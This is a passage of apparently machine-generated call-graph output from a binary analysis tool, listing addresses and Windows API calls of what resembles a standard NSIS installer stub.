CreateFontIndirectW 4708->4710 4709->4706 4710->4709 4711 40111b 6 API calls 4710->4711 4711->4709 4712 401f80 4713 401446 18 API calls 4712->4713 4714 401f88 4713->4714 4715 401446 18 API calls 4714->4715 4716 401f93 4715->4716 4717 401fa3 4716->4717 4718 40145c 18 API calls 4716->4718 4719 401fb3 4717->4719 4720 40145c 18 API calls 4717->4720 4718->4717 4721 402006 4719->4721 4722 401fbc 4719->4722 4720->4719 4723 40145c 18 API calls 4721->4723 4724 401446 18 API calls 4722->4724 4725 40200d 4723->4725 4726 401fc4 4724->4726 4728 40145c 18 API calls 4725->4728 4727 401446 18 API calls 4726->4727 4729 401fce 4727->4729 4730 402016 FindWindowExW 4728->4730 4731 401ff6 SendMessageW 4729->4731 4732 401fd8 SendMessageTimeoutW 4729->4732 4734 402036 4730->4734 4731->4734 4732->4734 4733 4030e3 4734->4733 4736 405f7d wsprintfW 4734->4736 4736->4733 4737 402880 4738 402884 4737->4738 4739 40145c 18 API calls 4738->4739 4740 4028a7 4739->4740 4741 40145c 18 API calls 4740->4741 4742 4028b1 4741->4742 4743 4028ba RegCreateKeyExW 4742->4743 4744 4028e8 4743->4744 4749 4029ef 4743->4749 4745 402934 4744->4745 4747 40145c 18 API calls 4744->4747 4746 402963 4745->4746 4748 401446 18 API calls 4745->4748 4750 4029ae RegSetValueExW 4746->4750 4753 40337f 33 API calls 4746->4753 4751 4028fc lstrlenW 4747->4751 4752 402947 4748->4752 4756 4029c6 RegCloseKey 4750->4756 4757 4029cb 4750->4757 4754 402918 4751->4754 4755 40292a 4751->4755 4759 4062cf 11 API calls 4752->4759 4760 40297b 4753->4760 4761 4062cf 11 API calls 4754->4761 4762 4062cf 11 API calls 4755->4762 4756->4749 4758 4062cf 11 API calls 4757->4758 4758->4756 4759->4746 4768 406250 4760->4768 4765 402922 4761->4765 4762->4745 4765->4750 4767 4062cf 11 API calls 4767->4765 4769 406273 4768->4769 4770 4062b6 4769->4770 4771 406288 wsprintfW 4769->4771 4772 402991 4770->4772 4773 4062bf lstrcatW 4770->4773 4771->4770 4771->4771 4772->4767 4773->4772 4774 403d02 4775 403d0d 4774->4775 4776 403d11 4775->4776 4777 403d14 GlobalAlloc 4775->4777 4777->4776 4778 402082 4779 401446 18 API calls 4778->4779 4780 402093 SetWindowLongW 4779->4780 4781 4030e3 4780->4781 4782 402a84 4783 401553 19 API calls 4782->4783 4784 402a8e 4783->4784 4785 401446 18 API calls 4784->4785 4786 402a98 4785->4786 4787 401a13 4786->4787 4788 402ab2 RegEnumKeyW 4786->4788 4789 402abe RegEnumValueW 4786->4789 4790 402a7e 4788->4790 4789->4787 4789->4790 4790->4787 4791 4029e4 RegCloseKey 4790->4791 4791->4787 4792 402c8a 4793 402ca2 4792->4793 4794 402c8f 4792->4794 4796 40145c 18 API calls 4793->4796 4795 401446 18 API calls 4794->4795 4798 402c97 4795->4798 4797 402ca9 lstrlenW 4796->4797 4797->4798 4799 401a13 4798->4799 4800 402ccb WriteFile 4798->4800 4800->4799 4801 401d8e 4802 40145c 18 API calls 4801->4802 4803 401d95 ExpandEnvironmentStringsW 4802->4803 4804 401da8 4803->4804 4805 401db9 4803->4805 4804->4805 4806 401dad lstrcmpW 4804->4806 4806->4805 4807 401e0f 4808 401446 18 API calls 4807->4808 4809 401e17 4808->4809 4810 401446 18 API calls 4809->4810 4811 401e21 4810->4811 4812 4030e3 4811->4812 4814 405f7d wsprintfW 4811->4814 4814->4812 4815 40438f 4816 4043c8 4815->4816 4817 40439f 4815->4817 4818 403df6 8 API calls 4816->4818 4819 403d6b 19 API calls 4817->4819 4821 4043d4 4818->4821 4820 4043ac SetDlgItemTextW 4819->4820 4820->4816 4822 403f90 4823 403fa0 4822->4823 4824 403fbc 4822->4824 4833 405cb0 GetDlgItemTextW 4823->4833 4826 403fc2 SHGetPathFromIDListW 4824->4826 4827 403fef 4824->4827 4829 403fd2 4826->4829 4832 403fd9 SendMessageW 4826->4832 4828 403fad SendMessageW 4828->4824 4830 40141d 80 API calls 4829->4830 4830->4832 4832->4827 4833->4828 4834 402392 4835 40145c 18 API calls 4834->4835 4836 402399 4835->4836 4839 407224 4836->4839 4840 406efe 25 API calls 4839->4840 4841 407244 4840->4841 4842 4023a7 4841->4842 4843 40724e lstrcpynW lstrcmpW 4841->4843 4844 407280 4843->4844 4845 407286 lstrcpynW 4843->4845 4844->4845 4845->4842 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4846 402797 4847 40145c 18 API calls 4846->4847 4848 4027ae 4847->4848 4849 40145c 18 API calls 4848->4849 4850 4027b7 4849->4850 4851 40145c 18 API calls 4850->4851 4852 4027c0 GetPrivateProfileStringW lstrcmpW 4851->4852 4853 401e9a 4854 40145c 18 API calls 4853->4854 4855 401ea1 4854->4855 4856 401446 18 API calls 4855->4856 4857 401eab wsprintfW 4856->4857 3817 401a1f 3818 40145c 18 API calls 3817->3818 3819 401a26 3818->3819 3820 4062cf 11 API calls 3819->3820 3821 401a49 3820->3821 3822 401a64 3821->3822 3823 401a5c 3821->3823 3892 406035 lstrcpynW 3822->3892 3891 406035 lstrcpynW 3823->3891 3826 401a6f 3893 40674e lstrlenW CharPrevW 3826->3893 3827 401a62 3830 406064 5 API calls 3827->3830 3861 401a81 3830->3861 3831 406301 2 API calls 3831->3861 3834 401a98 CompareFileTime 3834->3861 3835 401ba9 3836 404f9e 25 API calls 3835->3836 3838 401bb3 3836->3838 3837 401b5d 3839 404f9e 25 API calls 3837->3839 3870 40337f 3838->3870 3841 401b70 3839->3841 3845 4062cf 11 API calls 3841->3845 3843 406035 lstrcpynW 3843->3861 3844 4062cf 11 API calls 3846 401bda 3844->3846 3850 401b8b 3845->3850 3847 401be9 SetFileTime 3846->3847 3848 401bf8 CloseHandle 3846->3848 3847->3848 3848->3850 3851 401c09 3848->3851 3849 406831 18 API calls 3849->3861 3852 401c21 3851->3852 3853 401c0e 3851->3853 3854 406831 18 API calls 3852->3854 3855 406831 18 API calls 3853->3855 3856 401c29 3854->3856 3858 401c16 lstrcatW 3855->3858 3859 4062cf 11 API calls 3856->3859 3858->3856 3862 401c34 3859->3862 3860 401b50 3864 401b93 3860->3864 3865 401b53 3860->3865 3861->3831 3861->3834 3861->3835 3861->3837 3861->3843 3861->3849 3861->3860 3863 4062cf 11 API calls 3861->3863 3869 405e7c GetFileAttributesW CreateFileW 3861->3869 3896 405e5c GetFileAttributesW 3861->3896 3899 405ccc 3861->3899 3866 405ccc MessageBoxIndirectW 3862->3866 3863->3861 3867 4062cf 11 API calls 3864->3867 3868 4062cf 11 API calls 3865->3868 3866->3850 3867->3850 3868->3837 3869->3861 3871 40339a 3870->3871 3872 4033c7 3871->3872 3905 403368 SetFilePointer 3871->3905 3903 403336 ReadFile 3872->3903 3876 401bc6 3876->3844 3877 403546 3879 40354a 3877->3879 3880 40356e 3877->3880 3878 4033eb GetTickCount 3878->3876 3883 403438 3878->3883 3881 403336 ReadFile 3879->3881 3880->3876 3884 403336 ReadFile 3880->3884 3885 40358d WriteFile 3880->3885 3881->3876 3882 403336 ReadFile 3882->3883 3883->3876 3883->3882 3887 40348a GetTickCount 3883->3887 3888 4034af MulDiv wsprintfW 3883->3888 3890 4034f3 WriteFile 3883->3890 3884->3880 3885->3876 3886 4035a1 3885->3886 3886->3876 3886->3880 3887->3883 3889 404f9e 25 API calls 3888->3889 3889->3883 3890->3876 3890->3883 3891->3827 3892->3826 3894 401a75 lstrcatW 3893->3894 3895 40676b lstrcatW 3893->3895 3894->3827 3895->3894 3897 405e79 3896->3897 3898 405e6b SetFileAttributesW 3896->3898 3897->3861 3898->3897 3900 405ce1 3899->3900 3901 405d2f 3900->3901 3902 405cf7 MessageBoxIndirectW 3900->3902 3901->3861 3902->3901 3904 403357 3903->3904 3904->3876 3904->3877 3904->3878 3905->3872 4858 40209f GetDlgItem GetClientRect 4859 40145c 18 API calls 4858->4859 4860 4020cf LoadImageW SendMessageW 4859->4860 4861 4030e3 4860->4861 4862 4020ed DeleteObject 4860->4862 4862->4861 4863 402b9f 4864 401446 18 API calls 4863->4864 4868 402ba7 4864->4868 4865 402c4a 4866 402bdf ReadFile 4866->4868 4875 402c3d 4866->4875 4867 401446 18 API calls 4867->4875 4868->4865 4868->4866 4869 402c06 MultiByteToWideChar 4868->4869 4870 402c3f 4868->4870 4871 402c4f 4868->4871 4868->4875 4869->4868 4869->4871 4876 405f7d wsprintfW 4870->4876 4873 402c6b SetFilePointer 4871->4873 4871->4875 4873->4875 4874 402d17 ReadFile 4874->4875 4875->4865 4875->4867 4875->4874 4876->4865 4877 402b23 GlobalAlloc 4878 402b39 4877->4878 4879 402b4b 4877->4879 4880 401446 18 API calls 4878->4880 4881 40145c 18 API calls 4879->4881 4883 402b41 4880->4883 4882 402b52 WideCharToMultiByte lstrlenA 4881->4882 4882->4883 4884 402b84 WriteFile 4883->4884 4885 402b93 4883->4885 4884->4885 4886 402384 GlobalFree 4884->4886 4886->4885 4888 4040a3 4889 4040b0 lstrcpynW lstrlenW 4888->4889 4890 4040ad 4888->4890 4890->4889 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a KiUserCallbackDispatcher KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4891 402da5 4892 4030e3 4891->4892 4893 402dac 4891->4893 4894 401446 18 API calls 4893->4894 4895 402db8 4894->4895 4896 402dbf SetFilePointer 4895->4896 4896->4892 4897 402dcf 4896->4897 4897->4892 4899 405f7d wsprintfW 4897->4899 4899->4892 4900 4049a8 GetDlgItem GetDlgItem 4901 4049fe 7 API calls 4900->4901 4906 404c16 4900->4906 4902 404aa2 DeleteObject 4901->4902 4903 404a96 SendMessageW 4901->4903 4904 404aad 4902->4904 4903->4902 4907 404ae4 4904->4907 4910 406831 18 API calls 4904->4910 4905 404cfb 4908 404da0 4905->4908 4909 404c09 4905->4909 4914 404d4a SendMessageW 4905->4914 4906->4905 4918 40487a 5 API calls 4906->4918 4931 404c86 4906->4931 4913 403d6b 19 API calls 4907->4913 4911 404db5 4908->4911 4912 404da9 SendMessageW 4908->4912 4915 403df6 8 API calls 4909->4915 4916 404ac6 SendMessageW SendMessageW 4910->4916 4923 404dc7 ImageList_Destroy 4911->4923 4924 404dce 4911->4924 4929 404dde 4911->4929 4912->4911 4919 404af8 4913->4919 4914->4909 4921 404d5f SendMessageW 4914->4921 4922 404f97 4915->4922 4916->4904 4917 404ced SendMessageW 4917->4905 4918->4931 4925 403d6b 19 API calls 4919->4925 4920 404f48 4920->4909 4930 404f5d ShowWindow GetDlgItem ShowWindow 4920->4930 4926 404d72 4921->4926 4923->4924 4927 404dd7 GlobalFree 4924->4927 4924->4929 4933 404b09 4925->4933 4935 404d83 SendMessageW 4926->4935 4927->4929 4928 404bd6 GetWindowLongW SetWindowLongW 4932 404bf0 4928->4932 4929->4920 4934 40141d 80 API calls 4929->4934 4944 404e10 4929->4944 4930->4909 4931->4905 4931->4917 4936 404bf6 ShowWindow 4932->4936 4937 404c0e 4932->4937 4933->4928 4939 404b65 SendMessageW 4933->4939 4940 404bd0 4933->4940 4942 404b93 SendMessageW 4933->4942 4943 404ba7 SendMessageW 4933->4943 4934->4944 4935->4908 4951 403dc4 SendMessageW 4936->4951 4952 403dc4 SendMessageW 4937->4952 4939->4933 4940->4928 4940->4932 4942->4933 4943->4933 4945 404e54 4944->4945 4948 404e3e SendMessageW 4944->4948 4946 404f1f InvalidateRect 4945->4946 4950 404ecd SendMessageW SendMessageW 4945->4950 4946->4920 4947 404f35 4946->4947 4949 4043d9 21 API calls 4947->4949 4948->4945 4949->4920 4950->4945 4951->4909 4952->4906 4953 4030a9 SendMessageW 4954 4030c2 InvalidateRect 4953->4954 4955 4030e3 4953->4955 4954->4955 3906 4038af #17 SetErrorMode OleInitialize 3907 406328 3 API calls 3906->3907 3908 4038f2 SHGetFileInfoW 3907->3908 3980 406035 lstrcpynW 3908->3980 3910 40391d GetCommandLineW 3981 406035 lstrcpynW 3910->3981 3912 40392f GetModuleHandleW 3913 403947 3912->3913 3914 405d32 CharNextW 3913->3914 3915 403956 CharNextW 3914->3915 3926 403968 3915->3926 3916 403a02 3917 403a21 GetTempPathW 3916->3917 3982 4037f8 3917->3982 3919 403a37 3921 403a3b GetWindowsDirectoryW lstrcatW 3919->3921 3922 403a5f DeleteFileW 3919->3922 3920 405d32 CharNextW 3920->3926 3924 4037f8 11 API calls 3921->3924 3990 4035b3 GetTickCount GetModuleFileNameW 3922->3990 3927 403a57 3924->3927 3925 403a73 3928 403af8 3925->3928 3930 405d32 CharNextW 3925->3930 3966 403add 3925->3966 3926->3916 3926->3920 3933 403a04 3926->3933 3927->3922 3927->3928 4075 403885 3928->4075 3934 403a8a 3930->3934 4082 406035 lstrcpynW 3933->4082 3945 403b23 lstrcatW lstrcmpiW 3934->3945 3946 403ab5 3934->3946 3935 403aed 3938 406113 9 API calls 3935->3938 3936 403bfa 3939 403c7d 3936->3939 3941 406328 3 API calls 3936->3941 3937 403b0d 3940 405ccc MessageBoxIndirectW 3937->3940 3938->3928 3942 403b1b ExitProcess 3940->3942 3944 403c09 3941->3944 3948 406328 3 API calls 3944->3948 3945->3928 3947 403b3f CreateDirectoryW SetCurrentDirectoryW 3945->3947 4083 4067aa 3946->4083 3950 403b62 3947->3950 3951 403b57 3947->3951 3952 403c12 3948->3952 4100 406035 lstrcpynW 3950->4100 4099 406035 lstrcpynW 3951->4099 3956 406328 3 API calls 3952->3956 3959 403c1b 3956->3959 3958 403b70 4101 406035 lstrcpynW 3958->4101 3960 403c69 ExitWindowsEx 3959->3960 3965 403c29 GetCurrentProcess 3959->3965 3960->3939 3964 403c76 3960->3964 3961 403ad2 4098 406035 lstrcpynW 3961->4098 3967 40141d 80 API calls 3964->3967 3969 403c39 3965->3969 4018 405958 3966->4018 3967->3939 3968 406831 18 API calls 3970 403b98 DeleteFileW 3968->3970 3969->3960 3971 403ba5 CopyFileW 3970->3971 3977 403b7f 3970->3977 3971->3977 3972 403bee 3973 406c94 42 API calls 3972->3973 3975 403bf5 3973->3975 3974 406c94 42 API calls 3974->3977 3975->3928 3976 406831 18 API calls 3976->3977 3977->3968 3977->3972 3977->3974 3977->3976 3979 403bd9 CloseHandle 3977->3979 4102 405c6b CreateProcessW 3977->4102 3979->3977 3980->3910 3981->3912 3983 406064 5 API calls 3982->3983 3984 403804 3983->3984 3985 40380e 3984->3985 3986 40674e 3 API calls 3984->3986 3985->3919 3987 403816 CreateDirectoryW 3986->3987 3988 405eab 2 API calls 3987->3988 3989 40382a 3988->3989 3989->3919 4105 405e7c GetFileAttributesW CreateFileW 3990->4105 3992 4035f3 4012 403603 3992->4012 4106 406035 lstrcpynW 3992->4106 3994 403619 4107 40677d lstrlenW 3994->4107 3998 40362a GetFileSize 3999 403726 3998->3999 4013 403641 3998->4013 4112 4032d2 3999->4112 4001 40372f 4003 40376b GlobalAlloc 4001->4003 4001->4012 4124 403368 SetFilePointer 4001->4124 4002 403336 ReadFile 4002->4013 4123 403368 SetFilePointer 4003->4123 4006 4037e9 4009 4032d2 6 API calls 4006->4009 4007 403786 4010 40337f 33 API calls 4007->4010 4008 40374c 4011 403336 ReadFile 4008->4011 4009->4012 4016 403792 4010->4016 4015 403757 4011->4015 4012->3925 4013->3999 4013->4002 4013->4006 4013->4012 4014 4032d2 6 API calls 4013->4014 4014->4013 4015->4003 4015->4012 4016->4012 4016->4016 4017 4037c0 SetFilePointer 4016->4017 4017->4012 4019 406328 3 API calls 4018->4019 4020 40596c 4019->4020 4021 405972 4020->4021 4022 405984 4020->4022 4138 405f7d wsprintfW 4021->4138 4023 405eff 3 API calls 4022->4023 4024 4059b5 4023->4024 4026 4059d4 lstrcatW 4024->4026 4028 405eff 3 API calls 4024->4028 4027 405982 4026->4027 4129 403ec1 4027->4129 4028->4026 4031 4067aa 18 API calls 4032 405a06 4031->4032 4033 405a9c 4032->4033 4035 405eff 3 API calls 4032->4035 4034 4067aa 18 API calls 4033->4034 4036 405aa2 4034->4036 4037 405a38 4035->4037 4038 405ab2 4036->4038 4039 406831 18 API calls 4036->4039 4037->4033 4041 405a5b lstrlenW 4037->4041 4044 405d32 CharNextW 4037->4044 4040 405ad2 LoadImageW 4038->4040 4140 403ea0 4038->4140 4039->4038 4042 405b92 4040->4042 4043 405afd RegisterClassW 4040->4043 4045 405a69 lstrcmpiW 4041->4045 4046 405a8f 4041->4046 4050 40141d 80 API calls 4042->4050 4048 405b9c 4043->4048 4049 405b45 SystemParametersInfoW CreateWindowExW 4043->4049 4051 405a56 4044->4051 4045->4046 4052 405a79 GetFileAttributesW 4045->4052 4054 40674e 3 API calls 4046->4054 4048->3935 4049->4042 4055 405b98 4050->4055 4051->4041 4056 405a85 4052->4056 4053 405ac8 4053->4040 4057 405a95 4054->4057 4055->4048 4058 403ec1 19 API calls 4055->4058 4056->4046 4059 40677d 2 API calls 4056->4059 4139 406035 lstrcpynW 4057->4139 4061 405ba9 4058->4061 4059->4046 4062 405bb5 ShowWindow LoadLibraryW 4061->4062 4063 405c38 4061->4063 4064 405bd4 LoadLibraryW 4062->4064 4065 405bdb GetClassInfoW 4062->4065 4066 405073 83 API calls 4063->4066 4064->4065 4067 405c05 DialogBoxParamW 4065->4067 4068 405bef GetClassInfoW RegisterClassW 4065->4068 4069 405c3e 4066->4069 4072 40141d 80 API calls 4067->4072 4068->4067 4070 405c42 4069->4070 4071 405c5a 4069->4071 4070->4048 4074 40141d 80 